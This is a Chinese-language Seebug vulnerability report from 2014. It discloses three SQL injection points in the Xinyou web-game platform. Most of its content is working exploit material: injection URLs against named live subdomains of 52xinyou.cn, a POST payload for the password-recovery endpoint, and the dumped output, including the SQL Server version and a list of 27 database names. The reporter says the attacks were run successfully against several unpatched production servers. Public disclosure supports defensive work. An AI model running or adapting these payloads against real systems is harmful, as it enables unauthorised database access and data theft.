信游科技页游平台程序新版通用型SQL注入三发

2014-01-16T00:00:00
ID SSV:95070
Type seebug
Reporter Root
Modified 2014-01-16T00:00:00

Description

简要描述:

我也来多处注入吧。已在多个服务器上测试成功,我也不知道前面的哥们提交过哪个了因为都还没修复

详细说明:

注入点1:api/mostserver.ashx 暴mssql版本号,gid参数: http://ht.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy001.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy002.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy003.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy004.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy005.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0 http://xy006.52xinyou.cn/api/mostserver.ashx?gid=1%20and%20@@version%3E0

<img src="https://images.seebug.org/upload/201401/15192001789f8869fdf0dfdc3ccaa2d00e5b14de.jpg" alt="20140115191906.jpg" width="600" onerror="javascript:errimg(this);">

Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (Intel X86) Apr 2 2010 15:53:02 Copyright (c) Microsoft Corporation Data Center Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2) (Hypervisor) 注入点2: http://xy006.52xinyou.cn/api/webaction.ashx posttype=find_pwd1&username=1&findtype=email&find_qus=%E4%BD%A0%E7%88%B6%E4%BA%B2%E7%9A%84%E5%90%8D%E5%AD%97&find_answer=1&button2=%E6%8F%90+%E4%BA%A4 username存在注入。 暴出的数据: available databases [27]: [] ht.52xinyou.com [] master [] max [] mf001 [] model [] msdb [] old.del [] ReportServer [] ReportServerTempDB [] tempdb [] v3.10.18 [] v3.11.11 [] v3.11.19 [] v31125 [] v31204 [] wan110 [] xy001_12_5 [] xy002_12_5 ………… 其它服务器雷同。

漏洞证明:

注入点3: 还是暴版本号 uid参数 http://ht.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&=1389776637531 http://xy001.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&=1389776637531 http://xy002.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&=1389776637531 http://xy003.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&=1389776637531 http://xy004.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&=1389776637531 http://xy005.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&=1389776637531 http://xy006.52xinyou.cn/api/remote/login.ashx?callback[]=jQuery17209673793469555676_1389776620123&cid=0.5447926581837237&pwd=e&rem=false&uid=e' and @@version>0--&_=1389776637531

<img src="https://images.seebug.org/upload/201401/1519264467bd03a18d476bc6ef4a0e47a33a474b.jpg" alt="20140115192637.jpg" width="600" onerror="javascript:errimg(this);">